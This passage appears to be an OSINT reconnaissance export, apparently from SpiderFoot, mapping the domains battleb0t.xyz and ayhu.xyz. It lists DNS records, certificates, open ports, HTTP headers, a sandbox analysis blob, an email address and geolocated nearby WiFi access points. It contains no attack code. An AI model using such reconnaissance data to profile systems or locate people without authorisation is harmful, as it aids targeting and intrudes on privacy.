a1J55sB1jh2yyAgp9gU2TTlKH22JllQWbKYrEsbRrNjjaWTpuGgMUZEhABzykAV0_5Ryf5b1Iu8aB_yUQXLfxLOISB2J16hIkX9JBFDhB-K2iwT5AigiDsDn3kKx7Yn_RfRJoS2pRLWMZrIYAvnVYgYm9y81edopks9rnm7ZmUwgzO-G3g49daHSOyerkiJ0r3J8Okw4DK6PeI9iYnnJ3PuZHAUjE4lk_8MrIhAc4uYX4K1o-9Ke-xbpTbnl7jmdG3Gm-3L29y4tiQBKGjYgOtRk8-ysAEQVxg_UH3seGqQfmukY-uxgmHTqDedEdiiNc4iffnQwUfSPCDaUaRSMt4-JL4MYFn2fdPc4VcXOX79Z268m3iG4CyIoyIieiZJxKq5Fytf17H7DrAwzAK-7_cWORr2s0UVl6ksSgbwFTpGy4N__sJOF51dtXEfVEmWHx_Pzkw3X_pi-v5lATWE8lvwSB-TSiJYfQSJHSYYT6HXfaT1w6X76n4kq-ZrPPxvvJoJiND7W8ZhQjzgNr36p7jhZIQMiMAEzKgTQ4vmitfYqD4w00ar7uYe4W9UaptpqutZe32-rsetHK4f8sKgJ3CeKwcgiEQOluwAYjS5sFZ43pJ1k3hVEeYe7pLW">
</form>
</div>
</div>
<script>
(function(){
window._cf_chl_opt={
cvId: '2',
cZone: 'www.ayhu.xyz',
cType: 'managed',
cNounce: '15631',
cRay: '7c5f6071cb5443bc',
cHash: '381065269fdd378',
cUPMDTk: "\/?__cf_chl_tk=eArohGzIRNubxh3D6IFMRkkS6OUaNS008kBgg4I5pUY-1683860063-0-gaNycGzNCiU",
cFPWv: 'b',
cTTimeMs: '1000',
cMTimeMs: '0',
cTplV: 5,
cTplB: 'cf',
cK: "",
cRq: {
ru: 'aHR0cHM6Ly93d3cuYXlodS54eXov',
ra: 'TW96aWxsYS81LjAgKFdpbmRvd3MgTlQgMTAuMDsgV2luNjQ7IHg2NDsgcnY6NjIuMCkgR2Vja28vMjAxMDAxMDEgRmlyZWZveC82Mi4w',
rm: 'R0VU',
d: 'q4f4pOzDOU+B6AF/zMNZTtfQUbZJdschTcFNDOWKy7up/+mqaf8truQ2KKjt/rj9tsUJvHCPMl5JvfNuCtkhZqw35DYnRx8YzO+NZjtA29VORnsHbyexmRukxXhkj1aUs/dhLsS5lOlcBynQLv3fAojBSMTo2irKEDIydphKjwI16wTgar4SzVlH066rSHCeJ2lW9V/EzSyT6l7asFs9WGN+Z8UjlTPKJ0lqdL3pvuxM1sycw7k1OEGh4TEFk1Zi1Tm1qR0tz33CqvHEhqWe/r3r5anajxc1h5XZ6KT0dxZzvkI9kjdFbs/PTqH3OLzFqntntP1dLIyJxruw2vIIQVb+EG/QQudh3iW9ZP10B65ViMqC73osReO89Glx14C4rnxvY8OJhiGTBOtdj00LRx9JN+pPLlnlA0YFKm2eKJVsXMpv+GW4A4i2NhsMxRv/+0WJcnA98Fw7X4UhvaDcRzqVlcJrpcoGpX4b3ekLBWbuGttHibBiFb8Dx03xS+AEGjoHAFPYd/6bzsrrE8hANuLdxtuQ9vdmh2M9tUxqXUEa48P3yZ8gGXIpNOoU9aBv',
t: 'MTY4Mzg2MDA2My4wMDEwMDA=',
m: 'ku7Iuu8p9xCCueKE3I6e30hCT4pHjE58URs2150Qfj8=',
i1: 'MsbaNnnSVdv9s0jxu/qFPg==',
i2: 'D5L567ziFL3S1185dlxV3g==',
zh: '5CSFfnxjX733uDcOs5b2wVtZyxz+ok/bRl8GY+r6VYM=',
uh: 'kmwDWEJPoYUZn2LK7fziBR63kfsS15IQSFUgqqBKdMU=',
hh: 'fqLp1aUJ26MbHPQQbwfAUprhzy4RljM1W5Ogim1le2Q=',
}
};
var trkjs = document.createElement('img');
trkjs.setAttribute('src', '/cdn-cgi/images/trace/managed/js/transparent.gif?ray=7c5f6071cb5443bc');
trkjs.setAttribute('alt', '');
trkjs.setAttribute('style', 'display: none');
document.body.appendChild(trkjs);
var cpo = document.createElement('script');
cpo.src = '/cdn-cgi/challenge-platform/h/b/orchestrate/managed/v1?ray=7c5f6071cb5443bc';
window._cf_chl_opt.cOgUHash = location.hash === '' && location.href.indexOf('#') !== -1 ? '#' : location.hash;
window._cf_chl_opt.cOgUQuery = location.search === '' && location.href.slice(0, location.href.length - window._cf_chl_opt.cOgUHash.length).indexOf('?') !== -1 ? '?' : location.search;
if (window.history && window.history.replaceState) {
var ogU = location.pathname + window._cf_chl_opt.cOgUQuery + window._cf_chl_opt.cOgUHash;
history.replaceState(null, null, "\/?__cf_chl_rt_tk=eArohGzIRNubxh3D6IFMRkkS6OUaNS008kBgg4I5pUY-1683860063-0-gaNycGzNCiU" + window._cf_chl_opt.cOgUHash);
cpo.onload = function() {
history.replaceState(null, null, ogU);
};
}
document.getElementsByTagName('head')[0].appendChild(cpo);
}());
</script>
</body>
</html>
|
| 2023-05-12 02:45:34 | Email Gateway (DNS MX Records) | No | DNS Raw Records | 0 | 0 | 1 | 0 | None | route3.mx.cloudflare.net | battleb0t.xyz |
| 2023-05-12 03:24:49 | Country | No | Country Name Extractor | 0 | 0 | 4 | 0 | None | United States | 00rz.com |
| 2023-05-12 02:54:00 | Netblock Membership | No | Censys | 0 | 0 | 2 | 0 | None | 104.21.0.0/20 | 104.21.6.166 |
| 2023-05-12 02:54:19 | HTTP Headers | No | Web Spider | 6 | 0 | 4 | 0 | None | {"nel": "{\"success_fraction\":0,\"report_to\":\"cf-nel\",\"max_age\":604800}", "alt-svc": "h3=\":443\"; ma=86400, h3-29=\":443\"; ma=86400", "x-content-type-options": "nosniff", "content-encoding": "gzip", "transfer-encoding": "chunked", "cf-cache-status": "MISS", "vary": "Accept-Encoding", "server": "cloudflare", "connection": "keep-alive", "etag": "W/\"8c335e8962efa39b56919d96c0b5527b\"", "report-to": "{\"endpoints\":[{\"url\":\"https:\\/\\/a.nel.cloudflare.com\\/report\\/v3?s=sZlRfK%2B18hvKHsoLJ40BkYB4lHX60aBHph6G1vTBEuSHhMJnpf00BL3raGeVno%2B26HQG4%2BW6ctKHKalYOpr00wtWKpk2uf4%2BwHegHXg02iluCPfF38%2B%2FPJX8%2B4PjVD4UW5HjHU9e\"}],\"group\":\"cf-nel\",\"max_age\":604800}", "cache-control": "public, max-age=14400, must-revalidate", "date": "Fri, 12 May 2023 02:54:19 GMT", "access-control-allow-origin": "*", "referrer-policy": "strict-origin-when-cross-origin", "content-type": "application/javascript", "cf-ray": "7c5f605affff189d-EWR"} | https://fluid.battleb0t.xyz/./script.js |
| 2023-05-12 03:42:18 | WiFi Access Point Nearby | No | Wigle.net | 0 | 0 | 4 | 0 | None | laethof_ipad (Net ID: 00:0C:E6:08:05:05) | 50.8897, 6.0563 |
| 2023-05-12 02:44:05 | SSL Certificate - Issued by | No | CertSpotter | 0 | 0 | 1 | 0 | None | C=US,O=Let's Encrypt,CN=R3 | battleb0t.xyz |
| 2023-05-12 03:01:43 | Blacklisted IP on Same Subnet | Yes | Honeypot Checker | 0 | 0 | 3 | 0 | None | Honeypotproject (188.114.97.219): Search Engine
Last Activity: 0 days ago
Threat Level: 29 | 188.114.97.0/24 |
| 2023-05-12 02:48:43 | SSL Certificate - Raw Data | No | Certificate Transparency | 0 | 0 | 1 | 0 | None | Certificate:
Data:
Version: 3 (0x2)
Serial Number:
03:9d:c5:27:de:ee:41:17:4e:89:34:e6:9d:87:79:d7:50:31
Signature Algorithm: sha256WithRSAEncryption
Issuer: C=US, O=Let's Encrypt, CN=R3
Validity
Not Before: Dec 27 01:19:20 2022 GMT
Not After : Mar 27 01:19:19 2023 GMT
Subject: CN=battleb0t.xyz
Subject Public Key Info:
Public Key Algorithm: rsaEncryption
RSA Public-Key: (2048 bit)
Modulus:
00:ab:c7:1b:0c:ed:c6:01:f8:ea:a9:b3:cf:08:17:
4f:a2:cb:7c:34:c4:66:12:e6:ef:f3:98:17:79:c9:
65:ee:66:4c:1f:9a:92:7d:33:ee:07:fa:2e:15:62:
f7:b4:f3:1f:d5:4f:2e:b1:67:a8:49:42:bf:e3:cc:
9a:b7:30:46:c2:68:f5:28:a9:64:69:6f:4c:4b:64:
24:c9:dc:ed:46:9f:a4:1f:c2:ef:6f:36:d0:bc:69:
27:b8:e2:d6:18:70:40:2c:b4:f5:ee:8f:f7:0d:8c:
6e:03:92:e7:5d:d6:3e:bc:bb:c9:5b:28:10:a0:5a:
f6:37:f5:e1:9e:15:23:72:6e:8e:69:01:09:a4:8c:
a4:c9:d7:db:05:01:90:48:4b:90:20:8c:38:7a:0a:
60:74:79:18:26:30:8e:60:0b:17:b9:24:a0:80:df:
3f:14:00:d3:09:e7:34:47:35:63:7c:54:d2:a0:9d:
e1:57:d1:cb:13:d3:3c:30:24:97:8e:ea:34:00:9f:
cc:6c:0c:6a:f7:54:bc:5e:60:dc:46:31:c2:09:de:
d9:c3:e3:63:1e:8f:1c:c5:90:90:e8:da:86:be:7d:
f1:c3:1f:1a:86:69:9b:0b:e0:b2:0c:47:08:c8:92:
59:2b:66:2f:fa:a1:38:a1:2f:10:65:f6:97:fd:16:
87:33
Exponent: 65537 (0x10001)
X509v3 extensions:
X509v3 Key Usage: critical
Digital Signature, Key Encipherment
X509v3 Extended Key Usage:
TLS Web Server Authentication, TLS Web Client Authentication
X509v3 Basic Constraints: critical
CA:FALSE
X509v3 Subject Key Identifier:
63:4E:15:85:56:5A:A4:94:02:C2:16:42:A4:A5:97:9A:38:02:57:97
X509v3 Authority Key Identifier:
keyid:14:2E:B3:17:B7:58:56:CB:AE:50:09:40:E6:1F:AF:9D:8B:14:C2:C6
Authority Information Access:
OCSP - URI:http://r3.o.lencr.org
CA Issuers - URI:http://r3.i.lencr.org/
X509v3 Subject Alternative Name:
DNS:battleb0t.xyz
X509v3 Certificate Policies:
Policy: 2.23.140.1.2.1
Policy: 1.3.6.1.4.1.44947.1.1.1
CPS: http://cps.letsencrypt.org
CT Precertificate Poison: critical
NULL
Signature Algorithm: sha256WithRSAEncryption
76:7f:d6:14:76:9a:00:79:07:de:19:f4:d2:24:0d:10:47:8b:
ae:3f:f8:44:9a:f2:ec:c1:7b:c5:a8:3e:1b:21:6a:d3:13:ea:
fb:6d:d3:d4:7a:d8:73:24:57:b7:c5:32:e7:93:1d:78:bc:d7:
ff:72:e3:d1:10:bf:79:59:e7:40:ad:5a:05:ec:c7:2b:28:99:
c1:ed:47:65:dd:b0:d9:8c:b9:fb:52:82:bf:aa:6b:d6:2b:5e:
26:b8:19:68:1f:cb:f7:83:5a:85:54:9b:67:dd:1c:c3:b5:19:
95:44:b2:10:39:c6:5d:ba:f4:dc:bd:f5:47:7d:2d:c3:7e:75:
c6:d5:af:d7:0f:c4:c8:38:03:fd:af:d2:65:d9:5e:49:76:fd:
fc:3f:85:65:96:12:92:30:76:19:b8:49:b0:4a:94:4c:bc:06:
3b:8d:29:dd:72:8b:b9:8f:94:30:a1:c6:0f:29:e6:44:ca:bb:
c4:7f:aa:99:ae:85:ab:60:ff:84:01:2b:19:b0:9f:0e:b2:bf:
6b:d8:54:fa:34:98:8f:4f:47:e3:d1:ce:6a:1c:59:12:82:39:
ad:8d:bb:d3:2e:49:4d:cc:e1:b9:78:44:ac:dd:a7:b9:87:43:
8d:e0:bd:42:23:b6:31:55:24:cd:a7:94:4c:30:87:24:49:6c:
3c:79:fe:30
| battleb0t.xyz |
| 2023-05-12 03:00:57 | Blacklisted IP on Same Subnet | Yes | Honeypot Checker | 0 | 0 | 3 | 0 | None | Honeypotproject (188.114.96.95): Search Engine
Last Activity: 0 days ago
Threat Level: 29 | 188.114.96.0/24 |
| 2023-05-12 02:44:28 | Affiliate - Internet Name | No | DNS Resolver | 0 | 0 | 2 | 0 | None | frabjous-lebkuchen-324004.netlify.app | funny.battleb0t.xyz |
| 2023-05-12 03:32:52 | Non-Standard HTTP Header | No | Strange Header Identifier | 0 | 0 | 5 | 0 | None | cross-origin-embedder-policy: require-corp | {"content-encoding": "gzip", "nel": "{\"success_fraction\":0,\"report_to\":\"cf-nel\",\"max_age\":604800}", "referrer-policy": "same-origin", "permissions-policy": "accelerometer=(),autoplay=(),camera=(),clipboard-read=(),clipboard-write=(),fullscreen=(),geolocation=(),gyroscope=(),hid=(),interest-cohort=(),magnetometer=(),microphone=(),payment=(),publickey-credentials-get=(),screen-wake-lock=(),serial=(),sync-xhr=(),usb=()", "cross-origin-resource-policy": "same-origin", "transfer-encoding": "chunked", "alt-svc": "h3=\":443\"; ma=86400, h3-29=\":443\"; ma=86400", "expires": "Thu, 01 Jan 1970 00:00:01 GMT", "vary": "Accept-Encoding", "server": "cloudflare", "connection": "close", "report-to": "{\"endpoints\":[{\"url\":\"https:\\/\\/a.nel.cloudflare.com\\/report\\/v3?s=VywvBB1i7auboS6du2SyYTMISxYgv0SAv9G2irfzrfSoLR0rWIxDql%2BDKBWgGtLF7kP8CwfOUwVMXmcuqTKfEc1L%2Fjta42Of8JEwGnOgDhCKAOR2s74ejvfrFg%3D%3D\"}],\"group\":\"cf-nel\",\"max_age\":604800}", "cf-mitigated": "challenge", "cache-control": "private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0", "date": "Fri, 12 May 2023 03:24:22 GMT", "x-frame-options": "SAMEORIGIN", "cross-origin-embedder-policy": "require-corp", "content-type": "text/html; charset=UTF-8", "cf-ray": "7c5f8c5eeb1a42bf-EWR", "cross-origin-opener-policy": "same-origin"} |
| 2023-05-12 02:54:03 | HTTP Headers | No | Censys | 0 | 0 | 2 | 0 | None | {"Content_Length": ["253"], "_encoding": {"Content_Length": "DISPLAY_UTF8", "Server": "DISPLAY_UTF8", "Cf_Ray": "DISPLAY_UTF8", "Connection": "DISPLAY_UTF8", "Content_Type": "DISPLAY_UTF8", "Date": "DISPLAY_UTF8"}, "Server": ["cloudflare"], "Cf_Ray": ["-"], "Connection": ["close"], "Content_Type": ["text/html"], "Date": ["<REDACTED>"]} | 172.67.135.9 |
| 2023-05-12 03:19:00 | WiFi Access Point Nearby | No | Wigle.net | 0 | 0 | 3 | 0 | None | Beens Gast (Net ID: 00:01:21:1F:B1:A1) | 52.3759, 4.8975 |
| 2023-05-12 02:55:01 | Open TCP Port Banner | No | Censys | 0 | 0 | 2 | 0 | None | HTTP/1.1 403 Forbidden
Date: <REDACTED>
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: close
X-Frame-Options: SAMEORIGIN
Referrer-Policy: same-origin
Cache-Control: private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Expires: Thu, 01 Jan 1970 00:00:01 GMT
Vary: Accept-Encoding
Server: cloudflare
CF-RAY: 7c5e66a4c91910fb-ORD
Content-Encoding: gzip
| 188.114.96.1 |
| 2023-05-12 02:59:54 | Affiliate - Email Address | No | E-Mail Address Extractor | 0 | 0 | 3 | 0 | None | robert@broofa.com | [{u'subsystem': None, u'classification_tags': [], u'crowdstrike_ai': {u'executable_process_memory_analysis': [], u'analysis_related_urls': [{u'url': u'http://privaterelay.appleid.com', u'type': u'extracted', u'verdict': u'malicious'}]}, u'total_processes': 3, u'threat_score': 50, u'compromised_hosts': [], u'environment_id': 100, u'major_os_version': None, u'submit_name': u'https://www.scca.com/vdesk/urlfilter_blocked.php3?errorcode=23&v=v2', u'signatures': [{u'category': u'General', u'origin': u'Created Mutant', u'identifier': u'mutant-0', u'name': u'Creates mutants', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 3, u'threat_level': 0, u'type': 4, u'description': u'"\\Sessions\\1\\BaseNamedObjects\\Local\\!BrowserEmulation!SharedMemory!Mutex"\n "\\Sessions\\1\\BaseNamedObjects\\Local\\VERMGMTBlockListFileMutex"\n "\\Sessions\\1\\BaseNamedObjects\\Local\\URLBLOCK_FILEMAPSWITCH_MUTEX_3508"\n "\\Sessions\\1\\BaseNamedObjects\\Local\\URLBLOCK_HASHFILESWITCH_MUTEX"\n "\\Sessions\\1\\BaseNamedObjects\\Local\\URLBLOCK_DOWNLOAD_MUTEX"\n "\\Sessions\\1\\BaseNamedObjects\\Local\\ZonesCacheCounterMutex"\n "\\Sessions\\1\\BaseNamedObjects\\Local\\ZonesLockedCacheCounterMutex"\n "\\Sessions\\1\\BaseNamedObjects\\IsoScope_db4_IE_EarlyTabStart_0xa48_Mutex"\n "\\Sessions\\1\\BaseNamedObjects\\IsoScope_db4_ConnHashTable<3508>_HashTable_Mutex"\n "\\Sessions\\1\\BaseNamedObjects\\{5312EE61-79E3-4A24-BFE1-132B85B23C3A}"\n "\\Sessions\\1\\BaseNamedObjects\\IsoScope_db4_IESQMMUTEX_0_303"\n "\\Sessions\\1\\BaseNamedObjects\\IsoScope_db4_IESQMMUTEX_0_331"\n "\\Sessions\\1\\BaseNamedObjects\\{66D0969A-1E86-44CF-B4EC-3806DDDA3B5D}"\n "Local\\InternetShortcutMutex"\n "{5312EE61-79E3-4A24-BFE1-132B85B23C3A}"\n "Local\\ZonesCacheCounterMutex"\n "IsoScope_db4_IESQMMUTEX_0_519"\n 
"IsoScope_db4_IESQMMUTEX_0_303"\n "Local\\ZonesLockedCacheCounterMutex"\n "Local\\!BrowserEmulation!SharedMemory!Mutex"'}, {u'category': u'General', u'origin': u'Network Traffic', u'identifier': u'network-1', u'name': u'Contacts server', u'attck_id_wiki': u'https://attack.mitre.org/techniques/T1071', u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': u'T1071', u'relevance': 1, u'threat_level': 0, u'type': 7, u'description': u'"54.235.135.6:443"\n "169.150.221.147:443"\n "142.250.189.162:443"\n "142.250.72.194:443"\n "142.251.214.136:443"\n "185.199.110.153:443"\n "142.250.191.42:443"\n "157.240.22.25:443"\n "108.139.1.13:443"\n "184.168.104.171:443"\n "142.250.189.226:443"\n "142.250.191.78:443"\n "18.155.202.90:443"\n "172.217.164.99:443"\n "142.251.46.162:443"\n "142.250.189.194:443"\n "142.250.141.156:443"\n "142.250.72.193:443"'}, {u'category': u'General', u'origin': u'Network Traffic', u'identifier': u'network-51', u'name': u'Queries DNS server', u'attck_id_wiki': u'https://attack.mitre.org/techniques/T1071/004', u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': u'T1071.004', u'relevance': 1, u'threat_level': 0, u'type': 7, u'description': u'"object.fm"\n "www.scca.com"'}, {u'category': u'General', u'origin': u'File/Memory', u'identifier': u'string-10', u'name': u'Found a reference to a known community page', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 7, u'threat_level': 0, u'type': 2, u'description': u'"* [http://developers.facebook.com/policy/]. This copyright notice shall be" (Indicator: "facebook.com")\n "* Copyright 2012 Twitter, Inc" (Indicator: "twitter")\n "* Designed and built with all the love in the world @twitter by @mdo and @fat." 
(Indicator: "twitter")\n "function $E(a){var b=a.state.wpc;if(null!==b&&""!==b)var c=b;else{b=a.state;a=a.win;if(a.google_ad_client)var d=String(a.google_ad_client);else{var e,f,g;if(null!=(g=null!=(f=null==(d=DE(a).head_tag_slot_vars)?void 0:d.google_ad_client)?f:null==(e=a.document.querySelector(".adsbygoogle[data-ad-client]"))?void 0:e.getAttribute("data-ad-client")))d=g;else{c:{d=a.document.getElementsByTagName("script");e=a.navigator&&a.navigator.userAgent||"";e=RegExp("appbankapppuzdradb|daumapps|fban|fbios|fbav|fb_iab|gsa/|messengerforios|naver|niftyappmobile|nonavigation|pinterest|twitter|ucbrowser|yjnewsapp|youtube"," (Indicator: "twitter")\n "function hn(a){switch(a){case "true":return!0;case "false":return!1;case "null":return null;case "undefined":break;default:try{var b=a.match(/^(?:\'(.*)\'|"(.*)")$/);if(b)return b[1]||b[2]||"";if(/^[-+]?\\d*(\\.\\d+)?$/.test(a)){var c=parseFloat(a);return c===c?c:void 0}}catch(d){}}};function jn(a){if(a.google_ad_client)return String(a.google_ad_client);var b,c,d,e,f;if(null!=(e=null!=(d=null==(b=X(a).head_tag_slot_vars)?void 0:b.google_ad_client)?d:null==(c=a.document.querySelector(".adsbygoogle[data-ad-client]"))?void 0:c.getAttribute("data-ad-client")))b=e;else{b:{b=a.document.getElementsByTagName("script");a=a.navigator&&a.navigator.userAgent||"";a=RegExp("appbankapppuzdradb|daumapps|fban|fbios|fbav|fb_iab|gsa/|messengerforios|naver|niftyappmobile|nonavigation|pinterest|twitter|ucbrowser|yjnewsapp|youtube"," (Indicator: "twitter")'}, {u'category': u'General', u'origin': u'Binary File', u'identifier': u'binary-16', u'name': u'Drops files marked as clean', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 10, u'threat_level': 0, u'type': 8, u'description': u'Antivirus vendors marked dropped file "urlblockindex_1_.bin" as clean (type is "data")\n Antivirus vendors marked dropped file "Tar2469.tmp" as clean (type is "data")\n Antivirus vendors marked 
dropped file "Tar2A0D.tmp" as clean (type is "data")'}, {u'category': u'Unusual Characteristics', u'origin': u'Binary File', u'identifier': u'binary-5', u'name': u'Drops cabinet archive files', u'attck_id_wiki': u'https://attack.mitre.org/techniques/T1105', u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': u'T1105', u'relevance': 10, u'threat_level': 0, u'type': 8, u'description': u'"Cab2468.tmp" has type "Microsoft Cabinet archive data Windows 2000/XP setup 62582 bytes 1 file at 0x2c +A "authroot.stl" number 1 6 datablocks 0x1 compression"\n "Cab23C6.tmp" has type "Microsoft Cabinet archive data Windows 2000/XP setup 62582 bytes 1 file at 0x2c +A "authroot.stl" number 1 6 datablocks 0x1 compression"\n "Cab2B27.tmp" has type "Microsoft Cabinet archive data Windows 2000/XP setup 62582 bytes 1 file at 0x2c +A "authroot.stl" number 1 6 datablocks 0x1 compression"\n "Cab2A0C.tmp" has type "Microsoft Cabinet archive data Windows 2000/XP setup 62582 bytes 1 file at 0x2c +A "authroot.stl" number 1 6 datablocks 0x1 compression"\n "Cab23D9.tmp" has type "Microsoft Cabinet archive data Windows 2000/XP setup 62582 bytes 1 file at 0x2c +A "authroot.stl" number 1 6 datablocks 0x1 compression"\n "Cab27F6.tmp" has type "Microsoft Cabinet archive data Windows 2000/XP setup 62582 bytes 1 file at 0x2c +A "authroot.stl" number 1 6 datablocks 0x1 compression"\n "77EC63BDA74BD0D0E0426DC8F8008506" has type "Microsoft Cabinet archive data Windows 2000/XP setup 62582 bytes 1 file at 0x2c +A "authroot.stl" number 1 6 datablocks 0x1 compression"\n "Cab26EB.tmp" has type "Microsoft Cabinet archive data Windows 2000/XP setup 62582 bytes 1 file at 0x2c +A "authroot.stl" number 1 6 datablocks 0x1 compression"\n "Cab23D8.tmp" has type "Microsoft Cabinet archive data Windows 2000/XP setup 62582 bytes 1 file at 0x2c +A "authroot.stl" number 1 6 datablocks 0x1 compression"'}, {u'category': u'Installation/Persistence', u'origin': u'Binary File', u'identifier': u'binary-0', 
u'name': u'Dropped files', u'attck_id_wiki': u'https://attack.mitre.org/techniques/T1105', u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': u'T1105', u'relevance': 3, u'threat_level': 0, u'type': 8, u'description': u'"urlblockindex_1_.bin" has type "data"- [targetUID: N/A]\n "J5LMIWI0.txt" has type "ASCII text"- Location: [%APPDATA%\\Microsoft\\Windows\\Cookies\\J5LMIWI0.txt]- [targetUID: 00000000-00003508]\n "original_1_.js" has type "ASCII text with CRLF line terminators"- [targetUID: N/A]\n "f_3_.txt" has type "ASCII text with very long lines with no line terminators"- [targetUID: N/A]\n "SGRF2RQT.txt" has type "ASCII text"- Location: [%APPDATA%\\Microsoft\\Windows\\Cookies\\SGRF2RQT.txt]- [targetUID: 00000000-00003444]\n "77EC63BDA74BD0D0E0426DC8F8008506" has type "data"- Location: [%LOCALAPPDATA%\\ow\\Microsoft\\CryptnetUrlCache\\Content\\77EC63BDA74BD0D0E0426DC8F8008506]- [targetUID: 00000000-00003444]\n "Tar2469.tmp" has type "data"- Location: [%TEMP%\\Tar2469.tmp]- [targetUID: 00000000-00003444]\n "f_5_.txt" has type "ASCII text with very long lines"- [targetUID: N/A]\n "original_2_.js" has type "UTF-8 Unicode text with very long lines with CRLF line terminators"- [targetUID: N/A]\n "aframe_1_.htm" has type "HTML document ASCII text with very long lines with no line terminators"- [targetUID: N/A]\n "SQF88PWE.txt" has type "ASCII text"- Location: [%APPDATA%\\Microsoft\\Windows\\Cookies\\SQF88PWE.txt]- [targetUID: 00000000-00003508]\n "hotjar-1689630_1_.js" has type "ASCII text with very long lines"- [targetUID: N/A]\n "modules.6af44455668b675aade1_1_.js" has type "UTF-8 Unicode text with very long lines"- [targetUID: N/A]\n "_CA5A6E9A-C9CD-11ED-BEC3-08002719F913_.dat" has type "Composite Document File V2 Document Cannot read section info"- [targetUID: N/A]\n "RecoveryStore._88F42E2F-C9CC-11ED-BEC3-08002719F913_.dat" has type "Composite Document File V2 Document Cannot read section info"- [targetUID: N/A]\n "Cab2468.tmp" has type 
"Microsoft Cabinet archive data Windows 2000/XP setup 62582 bytes 1 file at 0x2c +A "authroot.stl" number 1 6 datablocks 0x1 compression"- Location: [%TEMP%\\Cab2468.tmp]- [targetUID: 00000000-00003444]\n "panzoom_1_.js" has type "ASCII text with very long lines with no line terminators"- [targetUID: N/A]\n "IZGPZZYD.txt" has type "ASCII text"- Location: [%APPDATA%\\Microsoft\\Windows\\Cookies\\IZGPZZYD.txt]- [targetUID: 00000000-00003508]\n "search_2_.json" has type "JSON data"- [targetUID: N/A]\n "~DF7EB16B1E041EF79D.TMP" has type "data"- Location: [%TEMP%\\~DF7EB16B1E041EF79D.TMP]- [targetUID: 00000000-00003 |
| 2023-05-12 03:18:53 | WiFi Access Point Nearby | No | Wigle.net | 0 | 0 | 5 | 0 | None | L1NKSYS (Net ID: 00:0C:41:F6:2E:FE) | 39.0469, -77.4903 |
| 2023-05-12 02:54:38 | Open TCP Port | No | Censys | 0 | 0 | 3 | 0 | None | 172.67.168.252:8080 | 172.67.168.252 |
| 2023-05-12 03:13:01 | Malicious Co-Hosted Site | Yes | OpenPhish | 0 | 0 | 3 | 0 | None | OpenPhish [0-14n.github.io]
https://www.openphish.com/feed.txt | 0-14n.github.io |
| 2023-05-12 03:18:58 | WiFi Access Point Nearby | No | Wigle.net | 0 | 0 | 5 | 0 | None | APC (Net ID: 00:09:5B:4F:F1:CA) | 33.6170672,-111.90564645297056 |
| 2023-05-12 02:44:22 | Co-Hosted Site | No | SSL Certificate Analyzer | 0 | 0 | 2 | 0 | None | github.io | 185.199.108.153 |
| 2023-05-12 03:18:56 | WiFi Access Point Nearby | No | Wigle.net | 0 | 0 | 5 | 0 | None | CWhite-Aireconsole (Net ID: 00:02:0C:09:99:E0) | 37.7813933,-122.3918002 |
| 2023-05-12 03:03:16 | Internet Name - Unresolved | No | DNS Resolver | 0 | 0 | 2 | 0 | None | webmail.ayhu.xyz | [{u'not_after': u'2023-07-10T04:54:49', u'not_before': u'2023-04-11T04:54:50', u'issuer_ca_id': 180753, u'name_value': u'*.ayhu.xyz\nayhu.xyz', u'issuer_name': u'C=US, O=Google Trust Services LLC, CN=GTS CA 1P5', u'common_name': u'*.ayhu.xyz', u'serial_number': u'0d408dd97ca1bd4c0d06c53fc3e92ebc', u'entry_timestamp': u'2023-04-11T05:54:51.221', u'id': 9117673170}, {u'not_after': u'2023-05-12T05:22:09', u'not_before': u'2023-02-11T05:22:10', u'issuer_ca_id': 180753, u'name_value': u'*.ayhu.xyz\nayhu.xyz', u'issuer_name': u'C=US, O=Google Trust Services LLC, CN=GTS CA 1P5', u'common_name': u'*.ayhu.xyz', u'serial_number': u'0ce3f41ce8cbbbcf13f76c6f365ec2eb', u'entry_timestamp': u'2023-02-11T06:22:11.299', u'id': 8627857885}, {u'not_after': u'2023-03-14T04:12:31', u'not_before': u'2022-12-14T04:12:32', u'issuer_ca_id': 183283, u'name_value': u'*.ayhu.xyz\nayhu.xyz', u'issuer_name': u"C=US, O=Let's Encrypt, CN=E1", u'common_name': u'*.ayhu.xyz', u'serial_number': u'0310b430a3e0722fec4ebc95e312bb838d6f', u'entry_timestamp': u'2022-12-14T05:12:32.333', u'id': 8209207679}, {u'not_after': u'2023-03-14T04:12:31', u'not_before': u'2022-12-14T04:12:32', u'issuer_ca_id': 183283, u'name_value': u'*.ayhu.xyz\nayhu.xyz', u'issuer_name': u"C=US, O=Let's Encrypt, CN=E1", u'common_name': u'*.ayhu.xyz', u'serial_number': u'0310b430a3e0722fec4ebc95e312bb838d6f', u'entry_timestamp': u'2022-12-14T05:12:32.07', u'id': 8196466589}, {u'not_after': u'2023-03-14T04:12:06', u'not_before': u'2022-12-14T04:12:07', u'issuer_ca_id': 180753, u'name_value': u'*.ayhu.xyz\nayhu.xyz', u'issuer_name': u'C=US, O=Google Trust Services LLC, CN=GTS CA 1P5', u'common_name': u'*.ayhu.xyz', u'serial_number': u'00ff0e1ea46f55f0740eb383e107c9ea93', u'entry_timestamp': u'2022-12-14T05:12:08.377', u'id': 8196466213}, {u'not_after': u'2023-03-14T03:53:53', u'not_before': u'2022-12-14T03:53:54', 
